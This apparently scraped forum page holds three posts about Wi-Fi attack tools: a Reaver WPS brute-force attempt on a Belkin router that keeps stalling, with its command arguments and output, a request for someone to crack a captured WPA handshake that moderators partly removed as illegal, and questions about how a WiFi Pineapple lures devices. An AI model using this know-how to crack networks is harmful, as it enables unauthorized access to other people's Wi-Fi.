  23. I have been using reaver to brute-force attack on my WPA/WPA2 connection , But i seem to have a problem , The WPS pin cannot be found , It stops searching for a PIN at a specific place. Why is this happening ? And by the way i am using reaver from BEINI OS , Using Minidwep-gtk. I have searched for the WPA/WPA2 handshake and i've got it but i'm not sure if it really has a PSK or not because i tried cracking it using Cloudcracker and so far unsuccessful. I've tried with the 1.2 billion dictionary word list and i was unsuccessful. The router i am using for the WiFi is a Belkin 3bb9 router which is known for it's security standards. So my question is how do i fix this outcome for a positive one and what should i try? Arguments used on reaver : I Used the following arguments in reaver : -a -v -S -x 20 -r 100:10 -l 300 And the output is : Waiting for beacon from : 08:86:3B:FD:CB:B0 Associalted with 08:86:3B:FD:CB:B0 (BSSID: belkin.3bb9) Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 (0.00% complete @ 2013-06-26 :18:53 (0 seconds/pin) WARNING 10 false connections in a row Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 And it goes on as the same... No change. Is there any solution to this? and I Used Wireless card : wlan0 Atheros AR9285 ath9k-[phy0]. I have atta
  24. I have WPA handshake which i am having difficulty cracking since i don't have a Wordlist/Dictionary and I can't download a wordlist/dictionary since my current internet is limited to 2 GB per month and i need atleast 10GB to download a good wordlist :( . So the is anyone willing to crack my WPA for something in return? I cannot offer money though but i can offer something else. (Such as a month's free webhosting / Unlimited traffic and unlimited space ) And by the way , The Wifi from the which the WPA handshake was extracted from is Indian. Which means that the password will possibly be a indian name such as Sri vishnu or Jayashree or something like that. The first one to crack my WPA handshake will be rewarded with a smile. ^_^ <content removed due to OP admitting that this is illegal>
  25. So got my Pineapple today and after a bit of research I just wanted to clarify a couple of points to make sure I understand how it works. As I understand it the Wifi Pineapple can not spoof a WEP or WPA/WPA2 AP. Also Windows 7 no longer auto connects (The user has to manually connect to the network) Did Windows 7 used to? Or was it Windows XP? Regarding mobile devices I have had an interesting experience with my Andoid (ICS) Samsung S2. If I create a OPEN wifi hotspot manually in settings it will connect to the Pineapple under that name. But, any of the old OPEN hotpots in my phone such as Starbucks or McDonalds do not connect. Any insight onto why this happens? I also have noticed an interesting qwerk On my laptop I have 3 networks saved (in the following order) 1 - Home (WPA2) 2 - Work (WPA2-Enterprise) 3 - Starbucks(Open) When I am not in range of any of these networks but in range of the Wifi pineapple, my laptop can see the Work AP (as an open access point) but none of the other two. Any ideas why? Thanks
×
×
  • Create New...